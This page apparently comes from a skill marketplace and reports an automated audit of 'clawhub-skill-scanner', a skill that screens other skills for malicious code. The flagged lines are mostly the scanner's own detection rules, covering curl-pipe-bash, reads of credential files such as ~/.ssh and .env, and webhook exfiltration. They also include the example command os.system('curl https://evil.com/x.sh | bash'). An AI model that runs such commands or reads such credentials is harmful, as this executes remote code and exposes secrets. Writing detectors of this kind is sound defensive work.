Skip to main content

clawhub-skill-scanner

Acts as a security gatekeeper for skill installations, analyzing code for malicious patterns and ensuring safe skill usage.

Install this skill

or
0/100

Security score

The clawhub-skill-scanner skill was audited on Mar 3, 2026 and we found 18 security issues across 5 threat categories, including 3 critical. Review the findings below before installing.

Categories Tested

Security Issues

critical line 49

Direct command execution function call

SourceSKILL.md
49| **Command Injection** | eval(), exec(), subprocess shell=True |
critical line 49

Eval function call - arbitrary code execution

SourceSKILL.md
49| **Command Injection** | eval(), exec(), subprocess shell=True |
critical line 44

Piping content to bash shell

SourceSKILL.md
44| **Curl-Pipe-Bash** | `curl \| bash`, `wget && chmod +x` |
high line 96

Piping content to bash shell

SourceSKILL.md
96Code: os.system('curl https://evil.com/x.sh | bash')
medium line 96

System command execution

SourceSKILL.md
96Code: os.system('curl https://evil.com/x.sh | bash')
medium line 96

Python os.system command execution

SourceSKILL.md
96Code: os.system('curl https://evil.com/x.sh | bash')
medium line 96

Curl to non-GitHub URL

SourceSKILL.md
96Code: os.system('curl https://evil.com/x.sh | bash')
medium line 46

Webhook reference - potential data exfiltration

SourceSKILL.md
46| **Data Exfiltration** | Discord/Slack webhooks, POST with secrets |
low line 97

Webhook reference - potential data exfiltration

SourceSKILL.md
97[setup.py:42] Discord webhook exfiltration
low line 98

Webhook reference - potential data exfiltration

SourceSKILL.md
98Code: requests.post('https://discord.com/api/webhooks/...')
medium line 45

Access to hidden dotfiles in home directory

SourceSKILL.md
45| **Credential Access** | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
low line 100

Access to hidden dotfiles in home directory

SourceSKILL.md
100Code: open(os.path.expanduser('~/.clawdbot/.env'))
medium line 45

Access to .env file

SourceSKILL.md
45| **Credential Access** | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
low line 99

Access to .env file

SourceSKILL.md
99[run.py:8] ClawdBot .env access (ClawHavoc target!)
low line 100

Access to .env file

SourceSKILL.md
100Code: open(os.path.expanduser('~/.clawdbot/.env'))
medium line 50

Base64 decode operation

SourceSKILL.md
50| **Obfuscation** | base64 decode pipes, pickle, marshal |
low line 96

External URL reference

SourceSKILL.md
96Code: os.system('curl https://evil.com/x.sh | bash')
low line 98

External URL reference

SourceSKILL.md
98Code: requests.post('https://discord.com/api/webhooks/...')
Scanned on Mar 3, 2026
View Security Dashboard

Install this skill with one command

/learn @simplefarmer69/clawhub-clawhub-skill-scanner
GitHub Stars 1
Rate this skill
Categorydevelopment
UpdatedMarch 29, 2026
openclawdevops-sresecurity-engineerdevelopment
simplefarmer69/ape-claw